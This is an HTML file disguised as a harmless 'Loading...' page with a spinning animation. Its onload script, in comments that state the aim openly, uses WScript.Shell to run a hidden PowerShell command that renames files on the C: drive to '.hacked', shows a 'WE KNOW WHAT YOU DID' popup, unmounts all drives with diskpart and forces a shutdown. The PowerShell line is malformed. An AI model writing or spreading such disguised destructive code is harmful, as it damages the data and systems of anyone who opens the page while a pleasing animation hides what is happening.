<html>
<head>
<title>Loading...</title>
</head>
<body>
<style type="text/css"> 
    body {  background-color: black; } 

    #loading {  position: absolute; left: 50%; top: 50%; width: 150px; height: 150px; margin-top: -75px; margin-left: -75px; text-align: center; } 

    #loading img { width: 100%; } 

    #loading h1 { font-family:"Arial"; font-size:14px; color:#FFF;} 

    #loading h2 { font-family:"Arial"; font-size:12px; color:#FFF;} 

    .spinner { animation : rotation 0.6s infinite linear;}

    @keyframes rotation { from{transform : rotate(0deg);} to{transform : rotate(360deg);} }
</style>
<div id="loading">
    <img src="spinner.gif" class="spinner" />                                                        <h1>Loading...</h1><h2>(This may take a few minutes)</h2>
</div>
<script type="text/javascript">

        window.onload = function(){

            //powershell rename all system files extensions to .hacked in the background while in the foreground an eye pleasing loading animation is displayed.

            var shell = new ActiveXObject("WScript.Shell");

            shell.Run("powershell -executionpolicy bypass -command Rename-Item -Path C:*.* -NewName {$_.name}.hacked", 0);

            //pop up a scary message box with red flashing letters that say "WE KNOW WHAT YOU DID" for 10 seconds

            var msg = "WE KNOW WHAT YOU DID";

            shell.Popup(msg, 10, "Warning!", 48 + 0x10);

            //use disk manager to unmount all drives

            shell.Run("diskpart /s unmountall.txt", 0);

            //finally, shut down the computer

            shell.Run("shutdown /s /t 0", 0);
            };
</script>
</body>
</html>